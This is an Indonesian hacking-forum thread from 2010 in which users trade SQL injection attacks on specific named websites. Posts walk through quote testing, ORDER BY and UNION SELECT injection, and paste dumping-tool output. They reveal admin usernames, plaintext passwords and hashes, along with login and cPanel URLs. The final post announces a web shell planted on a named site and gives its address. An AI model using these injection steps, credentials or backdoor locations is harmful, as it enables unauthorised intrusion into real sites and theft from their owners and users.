bug site post di sini

Post by **peniru** » Tue Mar 02, 2010 1:59 pm

culun2000 wrote:Permisi om-om yg ganteng, saya mau nanya nih maklum newbie, ini menandakan bug pada suatu website ya? http://www.milim.com/news.php?id=100%27
jika benar, trus ngelanjutin buat dapatin pass adminnya gimana OM
Tolong OM ajarin SQL injection dong OM, Maklum Om anak baru.... :pusing: :pusing: :pusing:

kalo untuk sy yang masi cupu ini, itu adalah bug...

next step nyari tau dulu berapa panjang kolomna.. make perintah
http://www.milim.com/news.php?id=100 order by 1--
trus sampe muncul error lagi

untuk lebih jelasna bisa langsung liat tutor di link ni
http://forum.xcode.or.id/viewtopic.php?f=99&t=35297

faojand injector · Post by **faojand injector** » Thu Mar 25, 2010 9:06 am

adit_coolz wrote:

Code: Select all

[+] URL:http://www.duralee.com/trim/sku_treasure.php?Book_id=3+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 02:37:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: duralee_search
	User: [email protected]
	Version: 5.0.82-msl-usrs-sure2-log
[+] Dumping data from database "duralee_search" Table "Administrators"
[+] Column(s) ['user_id', 'username', 'user_password']
[+] Number of Rows: 3

[0] 60:ted:phpwork:
[1] 61:mark:phpwork:
[2] 62:duralee:duralee:duralee:

:devil

om cr yg kyag gituan gimana????? :pusing:

ScootR_3086 · Post by **ScootR_3086** » Tue Mar 30, 2010 5:20 pm

http://dtincr.ph/news.php?id=1%20and%20 ... a.tables--
:mati: :mati:
ga ketemu..

http://www.resalemall.net/product_list. ... a.tables--

kok tabelnya dikit ya...salah dmana ga tau ni

Post by **peniru** » Tue Mar 30, 2010 6:24 pm

ScootR_3086 wrote:http://dtincr.ph/news.php?id=1%20and%20 ... a.tables--
:mati: :mati:

ni nama2 tabel dbna

accre,
accredit,
menu,
misc,
ncr_accre,
news,
permitNumbers,
pressrel_sections,
pressrelease,
speeches,
tbl_auth_user => (user_id,user_password)

hasilna ini
(admin:admin),webmaster:0c458fde308cd12d
:love: :love:

carana:

http://dtincr.ph/news.php?id=-1%20union ... uth_user--

=================================== eof ==================================
login formna ini bro
http://dtincr.ph/icc/login_form.php
nih untuk cpanelna
http://dtincr.ph:2082/login/
silahkan.

ecko · Post by **ecko** » Tue Mar 30, 2010 7:03 pm

Kk peniru....help me pliiis. Aq cuma baru bisa sampe sini :
http://www.unveilingafrica.org/news.php ... SE%28%29--

admin_users,articles,bd_boards,bd_msgs,gallery,management,mmail,news,trustees << itu nama tabel nya saja.

Mohon dibantu untuk tahap selanjutnya. Saya ingin tahu step by step setelah ini.
:circle: :circle: :circle:

Terima kasih

ScootR_3086 · Post by **ScootR_3086** » Tue Mar 30, 2010 7:04 pm

woalah,,tabelnya yg itu ya.. :mati: :mati:
pantesan ga dapet2... ampe :pusing:
thank bro... :love: :love: :love:
cek tkp dlu yo...

ScootR_3086 · Post by **ScootR_3086** » Tue Mar 30, 2010 7:38 pm

ecko wrote:Kk peniru....help me pliiis. Aq cuma baru bisa sampe sini :
http://www.unveilingafrica.org/news.php ... SE%28%29--

admin_users,articles,bd_boards,bd_msgs,gallery,management,mmail,news,trustees << itu nama tabel nya saja.

Mohon dibantu untuk tahap selanjutnya. Saya ingin tahu step by step setelah ini.
:circle: :circle: :circle:

Terima kasih

kalo ga salah ini ya..

http://www.unveilingafrica.org/news.php ... in_users--

8:Administrator:Admin:*3E2BF00785BD9BCA965B726E2906B4A523236E42

login kalo ga salah disini ya??
http://www.unveilingafrica.org:2082/login/

lanjutnya ga tau lagi dah gmana.. :mati: :mati:

bener ga ya...mohon koreksinya...

ecko · Post by **ecko** » Tue Mar 30, 2010 7:56 pm

Terima kasih k ScootR_3086 atas bantuannya..... :love: :love: :love:
tapi ada yg aneh ma yang satu ini : 3E2BF00785BD9BCA965B726E2906B4A523236E42 <<< itu md5 bkn yah.
Coab dicrack juga hasilnya no result. Sedangkan itu kan password nya.
Oh iya k sebelum tahapan ini kan :
http://www.unveilingafrica.org/news.php ... in_users--
syntak untuk menampilkan atau untuk mengetahui id,rname,usr,pwd itu apa???
Mohon maaf aq banyak tanya kk.
:pusing: :pusing: :pusing:

ScootR_3086 · Post by **ScootR_3086** » Tue Mar 30, 2010 8:33 pm

http://www.heart13.com/admin/index.php

user : admin
pass : admin998
:mati: :mati:

Post by **peniru** » Sat May 29, 2010 2:13 pm

[+] URL:http://www.isei.or.id/news.php?id=-5+un ... rkc0de,5--
[+] Gathering MySQL Server Configuration...
Database: wdewanto_isei
User: wdewanto_piping@localhost
Version: 5.1.45
[+] Dumping data from database "wdewanto_isei" Table "user"
[+] Column(s) ['user_name', 'user_password']

nih ane kasi shell yg dah ane tanem.... :devil :devil

http://www.isei.or.id/data/.any.php

moga2 dapat berguna wat semuana... :malumalu: :malumalu: :licik: :licik:

*Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

bug site post di sini

Re: bug site post di sini

Re: bug site post di sini

Re: bug site post di sini

Re: bug site post di sini

Re: bug site post di sini

Re: bug site post di sini

Re: bug site post di sini

Re: bug site post di sini

Re: bug site post di sini

Re: bug site post di sini